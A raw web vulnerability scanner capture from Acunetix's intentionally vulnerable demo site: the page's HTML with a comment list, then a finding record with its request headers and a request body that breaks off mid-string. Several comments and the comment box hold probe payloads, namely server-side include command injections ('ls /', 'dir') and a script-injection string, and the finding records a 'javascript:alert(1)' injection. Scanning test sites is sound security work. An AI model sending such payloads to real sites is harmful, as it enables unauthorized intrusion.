PElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCJQ9kFgJmDxYCHwMFB0NvbW1lbnRkAiYPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAicPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIoD2QWAmYPFgIfAwUHQ29tbWVudGQCKQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCKg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAisPZBYCZg8WAh8DBQdDb21tZW50ZAIsD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAItD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCLg9kFgJmDxYCHwMFB0NvbW1lbnRkAi8PZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAjAPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIxD2QWAmYPFgIfAwUHQ29tbWVudGQCMg9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCMw9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAjQPZBYCZg8WAh8DBQdDb21tZW50ZAI1D2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAI2D2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCNw9kFgJmDxYCHwMFB0NvbW1lbnRkAjgPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAjkPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAI6D2QWAmYPFgIfAwUHQ29tbWVudGQCOw9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCPA9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAj0PZBYCZg8WAh8DBQdDb21tZW50ZAI+D2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZGQawGmSG05JV7sW7zgWF+MHj6979Q==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKm0t39BwKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBHM3i4OpvdVR9uOjEN2xIOmZx28v" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText"><!--#EXEC cmd="dir \"--></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:51 AM</DIV><DIV class="CommentText">"><!--#EXEC cmd="ls /"--><</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:51 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:51 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:51 AM</DIV><DIV class="CommentText"><!--#EXEC cmd="ls /"--></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:50 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText">0W45pz4p</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText"></div><scrIpt>alert(1);</scRipt><div></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText">"><!--#EXEC cmd="dir \"--><</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:51 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></div><scrIpt>alert(1);</scRipt><div></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=javascript%3Aalert%281%29%3B&id=2
Method	POST
Parameter	NewsAd
Attack	javascript:alert(1);
Evidence	javascript:alert(1);
Show / hide Request and Response
Request Header - size: 480 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=javascript%3Aalert%281%29%3B&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 Content-Length: 11097 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 11,097 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAg